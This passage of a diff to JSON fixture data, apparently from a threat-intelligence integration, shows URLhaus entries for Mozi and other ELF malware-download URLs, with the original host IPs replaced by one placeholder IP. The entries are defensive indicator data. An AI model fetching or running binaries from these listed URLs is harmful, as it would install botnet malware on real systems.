@@ -30894,18 +30894,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://49.68.21.201:57875/Mozi.m", + "original": "http://89.160.20.156:57875/Mozi.m", "scheme": "http", "port": 57875, - "domain": "49.68.21.201", - "full": "http://49.68.21.201:57875/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57875/Mozi.m" }, - "ip": "49.68.21.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694901350Z", - "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://49.68.21.201:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"49.68.21.201\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029293600Z", + "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://89.160.20.156:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30943,18 +30943,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.26.38:35523/Mozi.m", + "original": "http://89.160.20.156:35523/Mozi.m", "scheme": "http", "port": 35523, - "domain": "59.96.26.38", - "full": "http://59.96.26.38:35523/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35523/Mozi.m" }, - "ip": "59.96.26.38" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694905307Z", - "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://59.96.26.38:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.26.38\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029300100Z", + "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://89.160.20.156:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -30992,18 +30992,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://42.224.66.103:47418/i", + "original": "http://89.160.20.156:47418/i", "scheme": "http", "port": 47418, - "domain": "42.224.66.103", - "full": "http://42.224.66.103:47418/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47418/i" }, - "ip": "42.224.66.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694909235Z", - "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://42.224.66.103:47418/i\",\"url_status\":\"online\",\"host\":\"42.224.66.103\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.029306800Z", + "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://89.160.20.156:47418/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31041,18 +31041,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.206.240:53007/Mozi.m", + "original": "http://89.160.20.156:53007/Mozi.m", "scheme": "http", "port": 53007, - "domain": "27.41.206.240", - "full": "http://27.41.206.240:53007/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53007/Mozi.m" }, - "ip": "27.41.206.240" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694913633Z", - "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://27.41.206.240:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"27.41.206.240\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029313500Z", + "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://89.160.20.156:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31090,18 +31090,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.133.2:38089/Mozi.m", + "original": "http://89.160.20.156:38089/Mozi.m", "scheme": "http", "port": 38089, - "domain": "42.230.133.2", - "full": "http://42.230.133.2:38089/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38089/Mozi.m" }, - "ip": "42.230.133.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694917540Z", - "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://42.230.133.2:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"42.230.133.2\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029320200Z", + "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://89.160.20.156:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31139,18 +31139,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.178.221:35243/Mozi.m", + "original": "http://89.160.20.156:35243/Mozi.m", "scheme": "http", "port": 35243, - "domain": "42.230.178.221", - "full": "http://42.230.178.221:35243/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35243/Mozi.m" }, - "ip": "42.230.178.221" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694921508Z", - "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://42.230.178.221:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.178.221\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029327Z", + "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://89.160.20.156:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31188,18 +31188,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.249.12:50589/Mozi.m", + "original": "http://89.160.20.156:50589/Mozi.m", "scheme": "http", "port": 50589, - "domain": "42.224.249.12", - "full": "http://42.224.249.12:50589/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50589/Mozi.m" }, - "ip": "42.224.249.12" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694925335Z", - "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://42.224.249.12:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.249.12\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029333600Z", + "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://89.160.20.156:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31237,18 +31237,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.200.70.79:42479/Mozi.m", + "original": "http://89.160.20.156:42479/Mozi.m", "scheme": "http", "port": 42479, - "domain": "221.200.70.79", - "full": "http://221.200.70.79:42479/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42479/Mozi.m" }, - "ip": "221.200.70.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694929222Z", - "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://221.200.70.79:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.200.70.79\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029340100Z", + "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://89.160.20.156:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31286,18 +31286,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.168.94:43425/Mozi.m", + "original": "http://89.160.20.156:43425/Mozi.m", "scheme": "http", "port": 43425, - "domain": "42.224.168.94", - "full": "http://42.224.168.94:43425/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43425/Mozi.m" }, - "ip": "42.224.168.94" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694933971Z", - "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://42.224.168.94:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.168.94\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029346700Z", + "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://89.160.20.156:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31335,18 +31335,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://163.125.207.35:35013/Mozi.a", + "original": "http://89.160.20.156:35013/Mozi.a", "scheme": "http", "port": 35013, - "domain": "163.125.207.35", - "full": "http://163.125.207.35:35013/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35013/Mozi.a" }, - "ip": "163.125.207.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694938179Z", - "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://163.125.207.35:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"163.125.207.35\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029353200Z", + "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://89.160.20.156:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31384,18 +31384,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.44.244.43:35298/Mozi.m", + "original": "http://89.160.20.156:35298/Mozi.m", "scheme": "http", "port": 35298, - "domain": "125.44.244.43", - "full": "http://125.44.244.43:35298/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35298/Mozi.m" }, - "ip": "125.44.244.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694942627Z", - "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://125.44.244.43:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.44.244.43\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029359800Z", + "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://89.160.20.156:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31433,18 +31433,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.73.8.210:54174/Mozi.m", + "original": "http://89.160.20.156:54174/Mozi.m", "scheme": "http", "port": 54174, - "domain": "116.73.8.210", - "full": "http://116.73.8.210:54174/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54174/Mozi.m" }, - "ip": "116.73.8.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694947296Z", - "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://116.73.8.210:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.73.8.210\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029366400Z", + "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://89.160.20.156:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31482,18 +31482,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://121.61.104.66:42768/Mozi.a", + "original": "http://89.160.20.156:42768/Mozi.a", "scheme": "http", "port": 42768, - "domain": "121.61.104.66", - "full": "http://121.61.104.66:42768/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42768/Mozi.a" }, - "ip": "121.61.104.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694951634Z", - "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://121.61.104.66:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"121.61.104.66\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029373100Z", + "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://89.160.20.156:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31531,18 +31531,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.247.206.115:59110/Mozi.a", + "original": "http://89.160.20.156:59110/Mozi.a", "scheme": "http", "port": 59110, - "domain": "117.247.206.115", - "full": "http://117.247.206.115:59110/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59110/Mozi.a" }, - "ip": "117.247.206.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694956764Z", - "original": "{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://117.247.206.115:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.247.206.115\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029379700Z", + "original": "{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://89.160.20.156:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31580,18 +31580,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.198.43.18:51476/Mozi.m", + "original": "http://89.160.20.156:51476/Mozi.m", "scheme": "http", "port": 51476, - "domain": "119.198.43.18", - "full": "http://119.198.43.18:51476/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51476/Mozi.m" }, - "ip": "119.198.43.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694961433Z", - "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://119.198.43.18:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.198.43.18\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029386400Z", + "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://89.160.20.156:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31629,18 +31629,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.124.94.169:58839/Mozi.m", + "original": "http://89.160.20.156:58839/Mozi.m", "scheme": "http", "port": 58839, - "domain": "182.124.94.169", - "full": "http://182.124.94.169:58839/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58839/Mozi.m" }, - "ip": "182.124.94.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694966111Z", - "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://182.124.94.169:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.94.169\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029392900Z", + "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://89.160.20.156:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31678,18 +31678,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.46.166.16:50249/Mozi.m", + "original": "http://89.160.20.156:50249/Mozi.m", "scheme": "http", "port": 50249, - "domain": "125.46.166.16", - "full": "http://125.46.166.16:50249/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50249/Mozi.m" }, - "ip": "125.46.166.16" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694971872Z", - "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://125.46.166.16:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.46.166.16\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029399500Z", + "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://89.160.20.156:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31727,18 +31727,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.4.250.147:46173/Mozi.m", + "original": "http://89.160.20.156:46173/Mozi.m", "scheme": "http", "port": 46173, - "domain": "123.4.250.147", - "full": "http://123.4.250.147:46173/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46173/Mozi.m" }, - "ip": "123.4.250.147" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694975960Z", - "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://123.4.250.147:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.250.147\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029406Z", + "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://89.160.20.156:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -31776,18 +31776,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.124.57.87:43785/Mozi.m", + "original": "http://89.160.20.156:43785/Mozi.m", "scheme": "http", "port": 43785, - "domain": "182.124.57.87", - "full": "http://182.124.57.87:43785/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43785/Mozi.m" }, - "ip": "182.124.57.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694979967Z", - "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://182.124.57.87:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.57.87\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029412600Z", + "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://89.160.20.156:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 